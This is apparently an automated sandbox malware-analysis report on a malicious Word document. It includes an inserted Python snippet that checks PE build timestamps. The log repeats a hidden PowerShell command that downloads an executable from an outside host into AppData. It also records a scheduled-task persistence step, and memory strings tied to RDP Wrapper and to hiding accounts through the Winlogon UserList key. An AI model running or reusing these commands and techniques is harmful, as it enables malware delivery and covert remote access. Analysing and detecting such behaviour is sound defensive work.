Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: explorer[1].exe.0.dr, GUI/DangNhap.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: explorer.exe.4.dr, GUI/DangNhap.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: eDdYRRbouy.exe.8.dr, GUI/DangNhap.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.explorer.exe.1330000.0.unpack, GUI/DangNhap.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 8_2_05893E1C push esi; ret 8_2_05893E1F
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06979 push ebx; retn 0000h 20_2_05F0697A
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06930 push ebx; retn 0000h 20_2_05F06932
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06C80 push ebp; retn 0000h 20_2_05F06C82
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06850 push edx; retn 0000h 20_2_05F06852
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06808 push edx; retn 0000h 20_2_05F0680A
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06AE0 push esp; retn 0000h 20_2_05F06AE2
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F06A99 push esp; retn 0000h 20_2_05F06A9A
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 20_2_05F03E1C push esi; ret 20_2_05F03E1F
Source: C:\Users\user\AppData\Roaming\explorer.exe Code function: 29_2_05503E1C push esi; ret 29_2_05503E1F
Source: explorer[1].exe.0.dr Static PE information: 0xA015504D [Tue Feb 9 02:02:53 2055 UTC]
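The build stamp 0xA015504D that the report decodes to 9 February 2055 is a cheap static check worth automating: IMAGE_FILE_HEADER.TimeDateStamp is defined as seconds since the Unix epoch, so a value later than the time the sample was observed cannot be honest linker output. The Python below is an added example, not part of this report or of any analysis tool; it parses the DOS and COFF headers of a PE image, decodes the stamp and classifies it, using a constructed minimal header that carries only the stamp from this report. The observation date and the "earliest plausible" bound are assumptions. One caveat before reading a future stamp as deliberate tampering: .NET assemblies built with deterministic compilation have a content hash written into this field, which also looks like a random and often far-future date, so for a .NET dropper like explorer[1].exe the stamp corroborates the Assembly.Load(byte[]) unpacker and the push/ret sequences above rather than standing on its own.

```python
from __future__ import annotations
import struct
from datetime import datetime, timezone

REPORT_STAMP = 0xA015504D   # TimeDateStamp reported for explorer[1].exe above

# Assumed observation window: any observation date before the decoded stamp gives the same verdict.
OBSERVED_AT = datetime(2022, 1, 1, tzinfo=timezone.utc)
EARLIEST_PLAUSIBLE = datetime(2000, 1, 1, tzinfo=timezone.utc)   # assumed lower bound for a credible build

def pe_timestamp(data: bytes) -> int:
    """Read IMAGE_FILE_HEADER.TimeDateStamp; raise ValueError if the DOS/PE headers are missing."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no DOS header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # "PE\0\0" is followed by IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp

def decode_utc(stamp: int) -> tuple[int, int, int, int, int, int]:
    """Seconds since 1970-01-01 UTC, as the field is defined, to (Y, M, D, h, m, s)."""
    d = datetime.fromtimestamp(stamp, tz=timezone.utc)
    return (d.year, d.month, d.day, d.hour, d.minute, d.second)

def timestamp_verdict(stamp: int, observed_at: datetime = OBSERVED_AT,
                      earliest_plausible: datetime = EARLIEST_PLAUSIBLE) -> str:
    """'future' if built after observation, 'too_old' if before any plausible toolchain, else 'plausible'."""
    built = datetime.fromtimestamp(stamp, tz=timezone.utc)
    if built > observed_at:
        return "future"
    if built < earliest_plausible:
        return "too_old"
    return "plausible"

def build_minimal_pe(stamp: int) -> bytes:
    """Constructed test image: DOS header, PE signature and COFF header only (not loadable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: NT headers start right after the DOS header
    # Machine=i386, 0 sections, stamp, no symbols, no optional header, EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 0, stamp, 0, 0, 0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff

SAMPLE_IMAGE = build_minimal_pe(REPORT_STAMP)   # constructed; carries only the stamp from the report

if __name__ == "__main__":
    stamp = pe_timestamp(SAMPLE_IMAGE)
    print(hex(stamp), decode_utc(stamp), timestamp_verdict(stamp))
```

On a real sample, pass the file bytes to pe_timestamp instead of SAMPLE_IMAGE; the same header offsets apply to 32- and 64-bit images because the stamp sits in the COFF header, before the optional header whose layout differs.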

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Users\user\AppData\Roaming\explorer.exe File created: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe

Boot Survival

Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic 